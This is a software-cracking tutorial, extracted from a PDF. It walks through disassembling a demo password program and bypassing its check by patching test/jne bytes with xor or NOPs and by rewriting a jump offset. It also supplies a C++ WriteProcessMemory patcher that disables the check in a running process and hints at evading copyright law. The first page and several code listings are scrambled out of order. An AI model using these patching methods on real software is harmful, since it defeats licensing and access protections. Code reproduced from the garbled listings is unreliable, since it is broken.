’ May be omitted. But administrators or developers can also randomize these addresses on their own wish for extra security measures. /* everything defined into this section goes to newly created section “. return EXIT_SUCCESS. For developers’ attention about extra security of their programs structure.vinnu") int a=49. cout << "The buffer is: " << array << endl.a fixed address each time and each module loaded by it also loads itself at a fixed address (in win 2000. so that hackers cannot reveal the internal structure of their program encrypt their program using encryption and decryption mechanism and displace the static data or other things by placing it in other sections. This gives hackers a chance to develop and test exploit on their own machines and then attack on victim machines.*/ Let’s do it practically.vinnu”) // the ‘. #pragma data_seg (". XP. /* again everything defined will go to default sections.’ May be omitted. char argv[]) { cout << "The integer is: " << a << endl. but keep it as convention. etc but not in VISTA due to ASLR security). char array[] = "vinnu! JaiDeva!!!".vinnu” */ #pragma data_seg () // the ‘. but keep it as convention. It can be achieved in c++ using #pragma data_seg (“. #pragma data_seg () // the rest will go in default data section. int main (int argc. /* newsec. } 29 . system("PAUSE").cpp */ #include <iostream> using namespace std.
In this way the exe file is generated inside a directory named “Debug”.vinnu Well.vinnu /rawdata:bytes >nsvinnu. if you have visual studio then.txt The output is stored in a file named nsvinnu.cpp Well. Dump of file newsec.txt and is: Microsoft (R) COFF Binary File Dumper Version 6.00. All rights reserved.rdata 11000 .data 3000 .vinnu name 16 virtual size 19000 virtual address 1000 size of raw data 17000 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers C0000040 flags Initialized Data Read Write 30 .text 1000 . Then at command prompt give command: Dumpbin newsec. at command console give command: Cl /Gs newsec.exe File Type: EXECUTABLE IMAGE SECTION HEADER #4 . Now let us check that whether it contains those variables or not.exe The dumpbin output is: 4000 . To do so give command: Dumpbin /section:. we have created a section named ‘vinnu’. Or you can also compile it conventionally in GUI by pressing “F7” then “CTRL + F7” keys.To compile above program. Thus a smaller code is generated. by compiling with above method the compiler does not insert the ugly stack protection calls and optimizations.8168 Copyright (C) Microsoft Corp 1992-1998.
Remember while breaking the program codes you must review all the associated sections. . We will be analyzing the protection mechanisms in next sections.. carefully view the hex dump. Well. So you must follow all above listed techniques.vinnu! va!!!. But we cannot sure that the hidden arguments will be hidden anymore. So we have got what we were looking for. like the arguments of protection mechanism.e. use special characters like “ALT + 255” from num keypad.text section while only static data will be placed in the newly created section. in section names. 31 . As we found them in newly created section. Now convert it into decimal the value will be 49.RAW DATA #4 00419000: 31 00 00 00 76 69 6E 6E 75 21 20 4A 61 69 44 65 JaiDe 00419010: 76 61 21 21 21 00 Summary 1000 . No one suspects these sections for initialized variables. Actually we have transported these contents to a different section than the conventional one. It will make code analysis somewhat difficult. v i n).text. But remember that if we will prototype any function in any custom section in this way even then the executable code will be transferred to the .vinnu 1. isn’t it. Then the array buffer starts with hex equivalent 76 69 6E (i. Normally.rdata sections.. similarly it’s not difficult for a hacker to find them. etc. Yes! We’ve got it. For more security. better will be if you dump all sections in text files like above method. This technique is used to hide the important parts of software. secret passwords. The hex value just after 00419000: is 31 and now open the calculator and select the hex radio in calculator and type 31. Insure that ‘Numlock’ is on or in . But where is integer a = 49.
8) cmp checks two values for logical relation like equal. 6) mov d. So let us review some instructions: Instruction 1) push 2) pop 3) jmp 4) xor registers. Well don’t panic friends. After called function finishes its job. Believe us friends. which will be wrapping around the whole code. 5) call Meaning pushes the contents on top of the stack. greater. pops out the contents from top of the stack. an unconditional jump. First of all remember that there are only few assembly instructions (may be 5 to 6 or nearly finite). Exclusive OR operation on couple of calls a function. it returns the control to the instruction next to one. Well 32 . Now its time to learn about some of general purpose registers. Note. we are not going to land you in low level assembly environment directly without knowing their meaning. 7) test compares two values for equality. Registers are the blocks of processor itself. which called it. Every operation is carried out by transferring the data from memory to registers and then the processing is done. we our self cannot write fully functional programs in assembly but we can understand that what is going on. lesser.Assembly instructions Before we get indulged into protections and the disassembled instructions. etc. So it’s somewhat understandable that what is going on even if we are not assembly specialists. s moves the contents of s into d. its time to cram some of assembly instructions and for what these are meant for. depending upon the operator used.
That is why the inlined software has larger size than non-inlined counterpart. 33 .registers work synchronously so in order to optimize the speed of program. In inlined functions the function call is not made to another location. which is several times less than processors. it sometimes create nuisance for code diggers. That is why function inlining is done in c++. but the code of the function is inserted into the location wherever it is needed. the registers should be used as much as possible than stack other memory locations. Because it will be faster to work with cpu clock speeds of the order of GHz than with memory speed of few 100 MHz. which is outside of cpu cache or registers into memory. therefore. Also inlining code is not always the same everywhere it is inserted.
EBX. BX. for called function. ESP. but they can be used for other tasks as well. arguments. Every processing is done with the help of these parts of CPU. EIP. Remember the use of registers also dependents upon the compiler and operating system. ESP or stack pointer stores the address of the top of the stack frame and EBP is to store the stack frame base pointer. EBP. DX. In Linux the EAX register is used to store system call number. The instructions use these registers to accomplish their job. EDX. registers. CX etc. All these 32bit registers are the 32 bit incarnations of 16bit AX. therefore. arguments. ESI. new processors are equipped with a lots of specialized registers. The latest technologies demand overwhelming amount of processing and state management. The 32-bit general-purpose registers are EAX. Cram the chart given below: REGISTER -------EAX EBX ECX EDX EDI ESI ESP EBP EFL EIP DISCRIPTION ----------Work house. EDI. ‘this’ pointer Data Destination index Source index Stack pointer Stack frame base pointer Flags Instruction Pointer These are the general usages of general-purpose registers in different operating systems. EFL. But if we have to use only half of the 32bit register then 34 . The EIP register stores the address of instruction to be executed. etc. return. Every register has a specially assigned job.The Realm of Registers The registers are the lowest storage levels used for instruction processing. In all registers the ‘E’ stands for ‘Enhanced’. Base address. ECX. These registers are the parts of CPU itself. syscall no. in ECX the second argument is stored. EBX for first argument. counter.
we will have the control over the CPU of victim machine. etc. We will discus it in Buffer overflow section. we will try with all efforts to explain it there. By modifying the EIP. It is enough with registers now. which is controlled by us and is filled with machine code. Thus if by any means we can control this pointer in EIP register. Cl. then the processor will ultimately be derailed from its normal execution and will execute the code supplied by us. we have to concentrate on EIP (Enhanced Instruction Pointer). This is the way buffer overflow attack works. if we fill it with the address of buffer. 35 . Friends! It’s time to move further. Ah (Higher segment of EAX). This register contains the pointer to the instruction ready for the processing. In all of these registers.these registers will be divided as Al (lower segment of EAX). if anything strange will be introduced later in discussions.
These things will help us immensely in analyzing the code. Also remember that in most of the cases. nearly all library functions get concentrated at the bottom of the compiled program and the opcode gets placed near the top of the executable file. 36 . Wrong! Absolutely wrong! The startup code gets the control first. it appends the code generated by compiler with the code of all related library functions necessary to execute the programmers code.Compiling Action What happens during compiling action? Well in generally the compiler digests the high level program code into machine code (hex dump or also called the opcode or operational code) and then its job finishes. then after its job done it transfers the control over to the main or winmain or Dllmain in dll files. Now a simple question. As a result. are inserted even earlier than main() or winmain() functions opcode. now the linker comes into action. what part of program gets the control first when program is executed? The most of programmers answer will be main () or winmain () with no doubt. the functions which are defined first gets compiled first and therefore.
a physical property or object possessed by the user. 10)If the match is not found then. then. 5) The user-supplied credentials undergo a cryptographic change. 11)Jump to the section in which. diskette. etc. a file. the tracing of original secret passwords can be done by starting the 37 . etc. Although the step 4 is also important. The stepwise actions are as follows: 1) The initialization of program or system occurs. retinal scan. But these steps are the average security measures. 8) If the match is found. 4) The user responds to the challenge with his possession of the part of security like userID. 11 are important for us. The challenge may be in the form of a login userID and password. 7) The crypt obtained from the user credentials is then matched into the security token file. which is a part of security subsystem is obtained into the memory. 9 and step 10. 3) The security system throws a challenge against the user or another program which initiated it. according to the generated tokens. voice recognition system. finger prints. Below them security is rated as poor. 12)The program is terminated. password. Let us consider an example of a typical protection system employed in most kinds of security mechanisms. the login failed message is thrown to the user & if necessary as defined by programmer. the program pass out the control to the execution termination code. the necessary tokens are generated and the system execution is started with necessary privileges. 2) The program or the system then transfers control to the security protection system. 6) The secret security token file. Now the step 8. It is not necessary that all steps are programmed in the software. 9) Jump to next section where. file. like smartcard or disk.Pseudo Protection code Now it’s time to indulge into real action.
0.tracing from step 4. There are also other methods to crack the protection mechanism. the security check will always be passed OK (because the. xor always zeros out the register if xored with itself). Note: we are compiling the programs code in visual c++ 6. 3) If we change the if condition it’s assembly equivalent is test or cmp (depending on the operators used). which will get clear practically. irrespective of the credentials supplied. All compilers compile the code differently and thus generate different machine code. but it is advised that you must compile the code in different compilers and try to analyze the code. Thus the jump after test condition (the test returns zero or non-zero). 38 . which has hex value 33. Now. the original credentials will be denied and the wrong one will get authenticated as legal ones. we have to consider the jumps at step 9 and step 11. Think about all possibilities to crack this security. 2) If we search for the address of the string of “login failed” which we have got from . Then. 1) If we interchange the jump addresses with each other.data section then we will land directly into the section which gets control after jump at step 11. Change test (hex value 0x85) to xor.
a debugger for the dynamic tracing of the security protection is required. But they cost in thousands rupees or the price may grow more than lakh rupees.EXE. which is available with most of the SDKs like visual studio. till date no decompiler or disassembler can reverse engineer any program back to its original form in high level language code. which is hard to understand. But here it will be used for a different purpose. its name is brain. Before indulging into real action we need some software tools. Hex editor is used because the executable files are nothing more than machine signals and as we all are familiar that machine signals are nothing more than binary numbers 0 and 1 and in turn these binary digits form hex numbers (base 16). don’t wonder. Most of us are not financially strong enough to buy them. And debugger in use will be one included in visual studio i. But HHD is freely available and is freely licensed to distribute as much as you can. IDA etc. also he don’t know the aftermaths of using such tools). But remember we are not going to make you script kiddies (the one who uses others tools and don’t know how the things are going on. and a disassembler or decompiler. Our RootKit is composed of DUMPBIN. Finally. As it does not 39 . But the charm of these tools is that they can do most of our time consuming jobs much easier in just flickers. But our approach will rely on a much reliable tool. This debugger is not friendly with code breakers.Tools of the Trade or RootKit The toolkit used by hackers is known as tools of the trade or also rootkit. But it can generate only a low level code. VC++ itself. which is freely available to all of us. We will not use any automatic tools here nor any dirty tricks but a much deeper approach. Most of the hackers use SoftIce. hex editor. In all advanced protection cracking techniques minimum of these three tools are essential. All these are available on a development system. Actually a debugger is helpful in finding the logical errors or bugs. We also need a debugger. Actually. HHD Hex editor.e. any hex editor can be used.
which employ the antidebugging techniques. This method is pretty useful in analyzing the code of programs. developers can use the techniques by which. But this method has several limitations like search for user passed strings cannot be done as code is not executed or traced and if the code is encrypted and can be decrypted only during execution then this technique again cannot be employed. But who can stop learning hands. In dynamic code analysis.provide memory searching tools etc. This technique is useful in analyzing the code. with the help of a hex editor. and anti-debugging techniques. Also developers should not imagine that their software is not so important so will not be broken. which employs every kind of protection of code itself like checksum calculation. Developers must keep in mind that they cannot stop a dedicated hacker for breaking their protection mechanism. In third method. But. the code is executed under debugger’s control. which are not used nowadays. the code is not executed. These are: 1) Static code analysis 2) Dynamic code analysis 3) Fusion analysis In static method. the fusion analysis composed of both above listed techniques. The Code Breaking Methods The three methods are basically applied for code analysis. 40 . The tracing of the protection mechanism is somewhat easier than static method. But this technique also falls if the developers employ the anti-debugging techniques in their code. The breakpoints are employed at suspected instructions or places. still of much use. which are employed side by side. The young hackers can spend several weeks in breaking even older programs. But the battle does not end here. encryption. instead its static disassembled assembly and hex dump is analyzed may be in the form of text files. they can still engage hacker and derail him from the protection mechanism to the junk code etc.
It’s not a war between the developers and hackers. but a necessary part of advanced technology conscious society. 41 .Well. it does not mean that hackers are spoilt part of our culture. instead they cause the advancement in technology and thus. evolves new protection mechanisms.
" << endl. } else { cout << "Login failed. char buffPass[21].cpp.exe Well. code is the folder containing the file secpass. and if the password matches (iAMsatisfied will be the password in this example) the program starts a new command console and if does not match it will show a login failed message and give three chances and if all chances are failed then the program terminates. char* argv[]) { char password[] = "iAMsatisfied". But we are compiling this program in such a way that the compiled code and decompiled code will contain no trail of any original high level code. } } return EXIT_SUCCESS. exit(0).getline(buffPass. 21).cpp */ #include <iostream> using namespace std. Let us do it at command prompt: c:\code>cl /Gs secpass. buffPass) == 0) system("START"). } { Compile this program as usual with debugging info for your own understanding with the help of Software Development Kits compiling settings.exe file. if (strcmp (password. Here is the code: /* secpass.Real Action Let us start it practically now. int main (int argc. a <= 3. cin. We are going to construct a simple security featured program which will ask for password. If you will compile it from 42 . Now run the secpass. a++) { cout << "Enter the password: ". for (int a=1.
exe >secpass.data section into rawdata as: C:\code>dumpbin /section:. Remember 16 bytes in each column. firstly use dumpbin to separate the sections of exe file. Like: C:\code>dumpbin secpass.txt. Well here you know the password but think if you don’t then how to crack the security.exe as: C:\code>dumpbin /disasm secpass. It will ask you a password if you will supply it “iAMsatisfied” then it will match and it starts a new console and if not then.text Well.txt The output is redirected to file secpassdat. only three sections. Now convert . Now disassemble the secpass.graphical interface visual c++ 6.data 3000 .exe File Type: EXECUTABLE IMAGE Summary 4000 . And middle is the hex equivalent of each character in rightmost column. But if we compile it using “Cl” then the exe will be created in same directory.rdata F000 . Leftmost column contains the address offsets. login failed message is displayed.txt 43 .exe>secpassdat.0 then the exe will go into debug directory default. a part of this file is: In above listing the rightmost column contains the data.data /rawdata:bytes secpass. Now run it.exe Dump of file secpass. For that purpose.
txt and note its offset. for loop condition section. 004010BC: 7F 6A jg 00401128 . the size of buffPass array. 004010D0: 6A 15 push 15h . We find 0040110D in our case. in decimal equal to . The protection mechanism must be inside these two offsets that are between 004010BE & 0040110D.“Enter the password” is pushed on the stack here.1 .The output is redirected to the text file secpass. 004010BE: 68 C0 30 41 00 push 4130C0h . Search for “4130E0” in assembly file secPass. 004010C3: 68 70 4C 41 00 push 414C70h 004010C8: E8 D3 13 00 00 call 004024A0 . then jump to exit section at “return EXIT_SUCCESS” part of code.were used by preceded function.2Ch A1 B0 30 41 00 mov eax. It is 004130C0.3 . this .8 . You may have a different one. We are displaying the main part of the code only here which is important to us along with its explanations inserted in lines starting with”. probably a call . 21.[004130B0] 89 45 D4 mov dword ptr [ebp-2Ch].[004130BC] 88 45 E0 mov byte ptr [ebp-20h]. just search for 4130C0 for better efficiency.txt.instruction is used to clear the number of bytes from the stack which .ecx 8B 15 B8 30 41 00 mov edx.edx A0 BC 30 41 00 mov al.” as: 55 push ebp 8B EC mov ebp. Now search for this offset in disassembled file using notepads find but omit first two zeros. it is “004130E0”. 004010CD: 83 C4 08 add esp.for cout or printf function which can print a string on the console. the string . 0040107E: 0040107F: 00401081: 00401084: 00401089: 0040108C: 00401092: 00401095: 0040109B: 0040109E: 004010A3: 004010A6: 44 .1 00 004010AD: EB 09 jmp 004010B8 004010AF: 8B 4D E4 mov ecx.dword ptr ds:[004130B4h] 89 4D D8 mov dword ptr [ebp-28h]. the result is at offset address 004010BE. counter. 004010B5: 89 4D E4 mov dword ptr [ebp-1Ch].dword ptr [ebp-1Ch] 004010B2: 83 C1 01 add ecx.ecx 004010B8: 83 7D E4 03 cmp dword ptr [ebp-1Ch].al C7 45 E4 01 00 00 mov dword ptr [ebp-1Ch].esp 83 EC 2C sub esp. 3.eax 8B 0D B4 30 41 00 mov ecx. But the procedure is same in every compiler mostly. the . not.txt. checking whether counter is equal to 3 or . if greater than .dword ptr ds:[004130B8h] 89 55 DC mov dword ptr [ebp-24h]. increment in . In the same way search for the string “Login failed” in data secpassdat. Now in data section text file search for string “Enter the Password:” and note down its first characters offset.
414D00h 004010DB: E8 F0 02 00 00 call 004013D0 . same function . .[ebp-18h] 004010E3: 50 push eax 004010E4: 8D 4D D4 lea ecx. in order to break it either change jne to je then wrong password will . “iAMsatisfeid”. thus eax register will get xored with . system () function 004010FE: 83 C4 04 add esp. the call to . Here . the eax register with an address [0x004130B0] which is a string . versatile functions are only printf and cout with different number of . this time 8 . As test return 0 if contents of registers are . 0040111C: 83 C4 08 add esp. or change the test to xor.[ebp-18h] . of the stack.eax . Now we have to check what eax contains. Thus comparison is going on. get pass the security check but legal one will fail. . failed action section in code. . will not be required. control will be transferred to next instruction. if password does not match. the line at offset 0x00401084 contains an instruction which loads . bingo! We are at the heart of protection mechanism.8 . filled it with zeros. 004010F4: 68 D8 30 41 00 push 4130D8h . equivalent to IF condition. 004010F9: E8 BD 46 00 00 call 004057BB . is provided the pointer to buffPass[] so it may be cin or getline. probably cout or printf. Thus. buffPass[]). 004010E0: 8D 45 E8 lea eax. And other instance of eax contains the string . the string . equal well the result is returned into eax register itself. the edx . cleared 4 bytes .8 004010F0: 85 C0 test eax. “START” which is an argument to system function. just change the hex numbers of test to xor or jne to that of nop or . itself and the contents will become all zeros. . this function . 0040111F: 8B C8 mov ecx. . jump to login . . is zero then the jne will not be processed and the executional . ( [ebp – 18h] points to .004010D2: 8D 55 E8 lea edx. also we can change the jne to nop so that no action will take place.eax 00401121: E8 4A 00 00 00 call 00401170 00401126: EB 87 jmp 004010AF 00401128: 33 C0 xor eax. is called after pushing the address of string “Login failed” on top . je.eax . But we . the return value 45 . 004010D5: 52 push edx 004010D6: B9 00 4D 41 00 mov ecx. such . the test is . Thus the passwords . from top of the stack means one word is pointer is removed. passwords are copied into ecx register.[ebp-2Ch] 004010E7: 51 push ecx 004010E8: E8 73 47 00 00 call 00405860 004010ED: 83 C4 08 add esp. is loaded with the pointer to buffPass now. arguments. The jne actually checks for eax contents if eax . contained into the array buffPass[]. bytes are cleared for same function [ earlier 4 bytes]. 004010F2: 75 14 jne 00401108 .
ESP register keeps track of top of the stack. So subtracting something from this address will make this address lower than the earlier address.exe and execute it. The processor just steps to the next instruction. The program starts a command shell irrespective of whatever password is typed. Just open the secpass. Now its time to understand few more things encountered into the above program.exe file into hexeditor. Isn’t it interesting? Now think about some other methods to crack the same code again. Keep in mind that the security mechanism will not be so simple everywhere and the passwords are not matched each time in clear text. Now change 85 c0 75 14 to 90 90 90 90. Now we will do the same by another method. but anyone can change this security file or authoritative hash. Now scroll down to address 0x000010F0 and you will find the hex value 85 c0 75 14 68. which was before 46 . with zeros). What happened? Aha! We broke the security mechanism. Also. Yes. Remember. of main()is being prepared in eax (typically a zero as XOR fills register .exe and intentionally pass it a wrong password other than “iAMsatisfied”. Now execute the file secrack. Save the changes to another file named secnop. And save the file as secrack. 90 is the hex code for NOP means no operation instruction.ebp 0040112C: 5D pop ebp 0040112D: C3 ret Now the Hex editor comes into scene. well. Again open the original secpass. Just change 85 c0 to 33 co for changing test to xor. So developers must arrange some features for securing these parts of security mechanism.exe in Hex editor or undo the changes in already open copy. Actually the address of top of the stack is preserved into ESP register. stack grows from higher memory addresses to lower memory addresses towards heap to save precious limited RAM. Keep in mind that the addresses in hex editor will not start with 0x00401000 but. instead 0x00000000 and 0x00401000 is equal to 0x00001000.2Ch This instruction reserves 44 bytes on stack.exe. Instead. The instruction: 00401081: 83 EC 2C sub esp. 0040112A: 8B E5 mov esp. Now see what happens again.. we did it again. a hash code is generated and then this hash is compared with the authoritative hash which may be in code or any external security file.
All in all. Remember that if address increases then. most of programming functions get converted into the API function.exe >secimp. And now consider the following instruction: 004010FE: 83 C4 04 add esp. every program is just a user interface and everything processed by the program is actually done by operating system. Now the question is how to know which API functions are called by the program and in case of libraries.dll 410000 4121C0 0 0 1E4 2D2 7D 29E F7 22F 20B 19F CA 174 Import Address Table Import Name Table time date stamp Index of first forwarder reference MultiByteToWideChar WideCharToMultiByte ExitProcess TerminateProcess GetCurrentProcess RtlUnwind RaiseException HeapFree GetCommandLineA GetVersion 47 . Operating system has API (application programming interface).txt The above command’s output is redirected to a text file secimp. which functions are available for sharing? Well the answer to both of these questions can be answered by DUMPBIN. then. Now check the following command: C:\code>dumpbin /imports secpass.txt open it and read it. Thus. These API calls are carried by library functions. Section contains the following imports: KERNEL32. the top of the stack decreases (the stack grows backward). Remember address decreases.subtraction. it means stack memory is increased. Now one more thing before preceding further. correspond to their counterparts in dynamically loaded libraries (dll). top of stack increases. Whatever coding you will do in whichever language will get converted into operating systems API calls. which are employed in programming languages. It means the address in ESP gets increased by 4 places higher value.4 This instruction clears the stack and decreases the stack memory 4 bytes short.
rdata HeapAlloc HeapReAlloc LCMapStringA LCMapStringW GetCPInfo CompareStringA CompareStringW HeapSize GetLastError GetFileAttributesA SetUnhandledExceptionFilter HeapDestroy HeapCreate VirtualFree VirtualAlloc IsBadWritePtr UnhandledExceptionFilter GetModuleFileNameA FreeEnvironmentStringsA FreeEnvironmentStringsW GetEnvironmentStrings GetEnvironmentStringsW SetHandleCount GetStdHandle GetFileType GetStartupInfoA WriteFile SetFilePointer FlushFileBuffers CloseHandle IsValidLocale IsValidCodePage GetLocaleInfoA EnumSystemLocalesA GetUserDefaultLCID GetVersionExA GetProcAddress GetModuleHandleA GetStringTypeA GetStringTypeW GetExitCodeProcess WaitForSingleObject CreateProcessA IsBadReadPtr IsBadCodePtr GetACP GetOEMCP LoadLibraryA ReadFile SetStdHandle SetEnvironmentVariableA GetLocaleInfoW 48 .199 1A2 1BF 1C0 BF 21 22 1A3 11A 10D 28B 19D 19B 2BF 2BB 1B8 2AD 124 B2 B3 106 108 26D 152 115 150 2DF 26A AA 1B 1BE 1BD 11C 77 171 175 13E 126 153 156 10B 2CE 44 1B5 1B2 B9 131 1C2 218 27C 262 11D Summary 4000 .data 3000 .
Carefully examine the lines: 21 22 CompareStringA CompareStringW The two functions listed above as names indicate deal with strings.dll >c:\dump\kernelxpo.) while Unicode can occupy 16 bits (2 bytes) hence. 49 .F000 . it can accommodate all alphabets of worlds all languages in a larger character space of 216 = 65536. Carefully watch the names of these two functions. Check it out. As Unicode the functions. The strings can be of two types either ASCII or Unicode. thus lead to total failure of execution of software.text The above output shows us that KERNEL32. ASCII characters can occupy 8 bits and therefore ASCII set is limited in character space only 256 (8bits constitutes character space = 28 = 256. There will be a huge list. This file is also very important in security analysis.txt Well. But think if we can totally side apart the security section and when execution starts the program should jump directly to the main sections but should not execute the security instructions. these differ in last characters A & W. In next discussions we will need this text file and few of these API functions.txt in folder named dump at c: drive. we redirected the output to a text file named kernelxpo.dll is loaded every time and the above listed functions are imported from it. Remember the total number of bytes in original software and number of bytes in cracked software should be same for proper working. automated cracking software can manage these problems.dll in a text file. Instead.g. E. to see what is available in kernel32. we need to manually change all offset related instructions. But. Note: we cannot delete the instructions. which will handle ASCII characters will be suffixed with ‘A’ while those handling Unicode strings will be suffixed with ‘W’. To know what functions a dll can export to other programs use ‘/exports’ switch in dumpbin. For this purpose we have to place either jump instructions or change all instructions to Nop sled. In similar way. Otherwise.dll let’s do it: C:\WINDOWS\system32>dumpbin /exports kernel32. as it will lead to alter the memory addressing offsets. change to nop sled by placing 0x90 instructions in place of those instructions hex equivalents. save the exports of USER32.
dword ptr [ebp-1Ch] in next line the counter is being incremented by 1 in ecx register.data section. .text section shown before or after the password is entered (generally this text may be like “Enter the password:” or the error messages if wrong password is entered).3 in above line the counter is compared with 3 (the maximum chances of entering passwords). Remember security functions are invoked before other regular instructions mostly but but after the startup code.dword ptr ds:[004130B4h] 00401092: 89 4D D8 mov dword ptr [ebp-28h].2Ch 00401084: A1 B0 30 41 00 mov eax.ecx 004010B8: 83 7D E4 03 cmp dword ptr [ebp-1Ch]. 00401089: 89 45 D4 mov dword ptr [ebp-2Ch]. 004010B2: 83 C1 01 add.al 004010A6: C7 45 E4 01 00 00 mov dword ptr [ebp-1Ch]. .1 004010B5: 89 4D E4 mov dword ptr [ebp-1Ch].[004130B0] the above address lies in .esp 00401081: 83 EC 2C sub esp.dword ptr ds:[004130B8h] 0040109B: 89 55 DC mov dword ptr [ebp-24h]. jump to exit section. A simple technique is to search for the address of text in . From 09 to 0x45 (45 = 69 bytes down the address of string “START” pushed to the stack.[ebp-2Ch] .edx 0040109E: A0 BC 30 41 00 mov al. 004010BC: 7F 6A jg 00401128 if counter is greater than 3 then.8 004010D0: 6A 15 push 15h 004010D2: 8D 55 E8 lea edx. we have landed in security related section. . 50 . . 004010AF: 8B 4D E4 mov ecx. . _main: 0040107E: 55 push ebp 0040107F: 8B EC mov ebp. . .First of all we must spot the first instruction of the security mechanism.exe.ecx 00401095: 8B 15 B8 30 41 00 mov edx. Open the text file containing the assembly of secpass.414D00h 004010DB: E8 F0 02 00 00 call 004013D0 004010E0: 8D 45 E8 lea eax. . .1 00 004010AD: EB 09 jmp 004010B8 let’s change above jump offset.[004130BC] 004010A3: 88 45 E0 mov byte ptr [ebp-20h].[ebp-18h] 004010E3: 50 push eax 004010E4: 8D 4D D4 lea ecx.eax 0040108C: 8B 0D B4 30 41 00 mov ecx.[ebp-18h] 004010D5: 52 push edx 004010D6: B9 00 4D 41 00 mov ecx.
eax 00401121: E8 4A 00 00 00 call 00401170 00401126: EB 87 jmp 004010AF below this comment. . We have the offset of jump as 0x09 we need to change it to 0x45.8 004010F0: 85 C0 test eax.eax the passwords are being matched by above instruction. We need to count the total number of hex values from 004010AD: EB 09 to 004010F4: 69 Just subtract the address 0x004010AF (next byte from jump instruction’s offset byte) from 0x004010F4. call for system.eax 0040112A: 8B E5 mov esp. (the position of EB will be counted as 0) it comes out to be 69. the address of string "START". . 004010F9: E8 BD 46 00 00 call 004057BB . jump to section showing “login failed” message. then change this count in hex format using calculator and open secpass. . 004010F2: 75 14 jne 00401108 004010F4: 68 D8 30 41 00 push 4130D8h . 004010FE: 83 C4 04 add esp. actually 0x45 = 69 in decimal form.8 0040111F: 8B C8 mov ecx. 004010E7: 51 push ecx 004010E8: E8 73 47 00 00 call 00405860 004010ED: 83 C4 08 add esp. . . the return value of main is being prepared as it will exit by returning 0 & it is returned through eax register by xoring it with itself.exe in hexeditor and change 0x09 to 0x45 the instruction 004010AD: EB 09 jmp 004010B8 51 ..ebp 0040112C: 5D pop ebp 0040112D: C3 ret We conclude that if jump offset at instruction 004010AD: EB 09 jmp 004010B8 (0x09) will change to the offset of instruction 004010F4: 68 D8 30 41 00 push 4130D8h (0x45 = 69bytes) then we can directly bypass the “Enter Password:” step and will directly land in our new command console. 0040111C: 83 C4 08 add esp. 00401128: 33 C0 xor eax. . if they do not match then.
Will automatically change to 004010AD: EB 45 jmp 004010F4 And now “Save As” the changes to file secjmp. The same techniques you can apply in most of the security systems to check the strength of the security mechanism. The same objective can be achieved by using WriteProcessMemory function and modifying the jump offset on-the-fly. We would learn the use of this function in forth coming sections.exe and run it. 52 . remember the security will not be so simple to understand everywhere.exe. We did it again. So you’ve learnt several ways to crack secpass. Most of the times we have to apply all of these techniques altogether.
txt Now check the kernel32xpo. the check will obviously vanish and will be transformed into nop sled (no operation code bytes).dll has the answer and gives us a a spark of light to perform this hack. But what if we do it on-th-fly with no evidences left after the terminatin of the process. the law gets hacked.eax 00401108 If we transform four code bytes 85 c0 75 14 into 90 90 90 90. We are interested in patching the following code in secpass. Let us do it in code: 53 .dll >c:\kernelxpo. physically temporing any copyright protected code or program can make you tresspass the law boundries.exe: 004010F0: 85 C0 004010F2: 75 14 test jne eax. The OpenProcess function needs the process id and returns the process handle. We have to provide this handle to the WriteProcessMemory function and it can write any number of bytes in target process space. We can apply all above code patching techniques at process level.Code Patching On-The-Fly Remember.txt file and you’ll find the following: ordinal hint RVA 629 917 274 394 name 0001E079 OpenProcess 0000220F WriteProcessMemory But WriteProcessMemory requires handle to the process to be patched. The Kernel32. Do the following command at windows\system32 directory: C:\windows\system32>dumpbin /exports kernel32. This techniques is the most amazing of all above stagnant methods applied above.
\n"). Now execute the secpass. printf("Failed to open process handle. HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS.. if (WriteProcessMemory(hProcess. pid). "usage:\npatch <processID>\n"). pid).Success...exe PID 1284 Session Name Console Session# 0 Mem Usage 624 K Now we execute patch: patch 384 Target process with pid : 384 Status: .\n")."./* patch. Compile it.. In our case it is 1284 as: Image Name secpass....exe and check its process id by executing tasklist command. if(hProcess != NULL) { printf("Target process with pid : %d\nStatus: . } else } else } return EXIT_SUCCESS. } char buffer[] = "\x90\x90\x90\x90".. { { fprintf(stderr.h> #define ADDRESS 0x004010F0 using namespace std. 54 .\n"). pid = atoi(argv[1]).Success. char **argv) if (argc < 2) exit(1). buffer.. (void *)ADDRESS.txt */ #include <iostream> #include <windows..Failed. int main (int argc. lstrlen(buffer). printf(". false. int pid = 0.... 0)) { printf("..
// now execute patch.The secpass. the security mechanism will not be so simple in most of cases.exe gets patched and it executes the nopsled instead of test and jne instructions. C:\Documents and Settings\vinnu\develop>secpass Enter the password: sdcsad Login failed.exe Enter the password: sdcsad C:\Documents and Settings\vinnu\develop> Second time the same password opens up the intended command console. Remember. and can be found scattered in several different block units. Therefore. 55 . it’ll need to be patched at several places simultaneously.
Remember. we have to analyze with a brain blasting efforts. But. Therefore. A hacker should be capable of handling any kind of user interface. may it be the interface of missile systems or the satellite control system or the interface of nuclear reactor. if you have to be a hacker then you must know that command console is stronger than GUI and what a command console can do sometimes GUI can’t do it. instead of user interfaces. But remember. Well software structure at machine level is dependent upon the compilers used to compile the higher-level code. We are going to discus the output of visual C++ 6. Note: But remember the final compilation before release does not include the debugging information thus. There is no need to study further chain.Understanding Architecture of Software at Low level Its time to study and identify some important parts of high level language codes at machine level or assembly level. most of remote attacks are possible using command console. We have to compile every program using CL compiler. And every developer’s defined function is called from within main or winmain.0 (Microsoft Visual Studio). which may be the fusion of GUI & CLI. 56 . we should focus on algorithms. Well. it is meant for the algorithms used irrespective of the user interface. the same code compiled in visual C++ 6. So let’s choose the hard path. if we alter the compilers compile settings to produce ‘debugging information’ then the picture becomes clear. When startup code finishes its work it transfers the control to main or winmain. console is also faster than GUI. we must identify the last function which transfers the control to main and after completion takes back the execution control. When the software finishes its job. it again return to end of main or winmain function and then main transfers the execution control along with its return value (mostly in EAX register) to the function which called main (_mainCRTStartup ()) which then calls exit ().0 will be different from that compiled in Borland and Watcom or any other compiler. and therefore. The main or winmain are not the first functions called at start of execution. in order to identify the main or winmain. GUI needs more memory and CPU resources than command console. Therefore. but startup code is started first. which can be used at command console and it provides more control over the compilation process. We don’t need to study the whole startup code. hacking has nothing to do with the user interfaces.
